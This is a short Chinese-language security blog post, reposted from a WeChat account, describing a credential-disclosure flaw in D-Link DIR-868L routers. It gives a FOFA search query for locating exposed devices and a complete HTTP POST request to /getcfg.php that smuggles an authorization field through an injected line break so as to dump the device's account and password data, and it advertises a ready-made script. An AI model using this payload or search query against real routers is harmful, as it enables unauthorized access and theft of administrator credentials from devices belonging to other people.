漏洞复现-某路由器账号密码泄露

admin 2021年9月24日17:08:44评论194 views字数 819阅读2分43秒阅读模式

免责声明:

由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!本文主要来自日常学习记录


漏洞简介:

D-Link 成立于 1986 年,创立至今三十年,凭借其完整多元的产品线以及优异且屡获国际奖项肯定的网络产品和服务,友讯科技已然成为年营收总值超过十亿美元的国际知名企业。 D-Link 在快速、竞争和不断发展的环境中,将持续提供高效能的网络解决方案协助消费者及各类型企业用户。近期网上爆出D-Link-Dir设备存在账号密码泄露漏洞!


FOFA语句:

app="D_Link-DIR-868L"


漏洞POC:

POST /getcfg.php HTTP/1.1Host: xxxxxxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeCookie: uid=XFOB50sMqSUpgrade-Insecure-Requests: 1Content-Type:application/x-www-form-urlencodedContent-Length: 61
SERVICES=DEVICE.ACCOUNT&attack=ture%0D%0AAUTHORIZED_GROUP%3D1


利用截图:

漏洞复现-某路由器账号密码泄露

脚本使用:

漏洞复现-某路由器账号密码泄露

获取脚本回复: DLink-DIR

本文始发于微信公众号(Fight Tigers Team):漏洞复现-某路由器账号密码泄露

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月24日17:08:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-某路由器账号密码泄露https://cn-sec.com/archives/379211.html

发表评论

匿名网友 填写信息